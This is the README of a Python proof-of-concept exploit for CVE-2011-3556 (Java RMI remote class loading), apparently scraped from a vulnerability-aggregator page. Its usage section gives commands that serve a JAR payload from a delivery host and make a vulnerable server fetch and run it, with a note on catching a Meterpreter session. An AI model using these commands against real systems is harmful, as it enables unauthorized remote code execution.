来源

关联漏洞

描述

Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).

介绍

# CVE-2011-3556 — Proof of Concept (PoC)

## Disclaimer

This tool is a Python 3 implementation of an existing [proof of concept (PoC)](https://www.exploit-db.com/raw/17535) made by mihi for the [Metasploit Framework](https://www.metasploit.com/).

## Prerequisites

To use the module, simply follow the instructions below:

```sh
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"
```

## Usage

### Command-line

To be remotely loaded by the vulnerable Java RMI server, the payload (a JAR binary) must be served as an HTTP resource. One could quickly serve it using the famous `python3 -m http.server`.

Once the payload is made available for download, simply execute the `exploit.py` script to trigger the vulnerability.

```sh
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`
```

> In case the payload is a Meterpreter (Metasploit Framework), do not forget to `use exploit/multi/handler`.

### Library

This module can also be used as a library by importing the `cve_2011_3556` module to your current namespace:

```python
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()
```

It's as simple as that!

## Credits

Special thanks to mihi for the initial implementation of the Metasploit Framework [module](https://www.exploit-db.com/raw/17535).

文件快照

 [4.0K]  /data/pocs/8b89efcb6a545eea0021ab5db4c1998677daf7e4
├── [3.2K]  exploit.py
├── [4.0K]  lib
│   └── [6.3K]  cve_2011_3556.py
├── [ 138]  Pipfile
└── [1.6K]  README.md

1 directory, 4 files

备注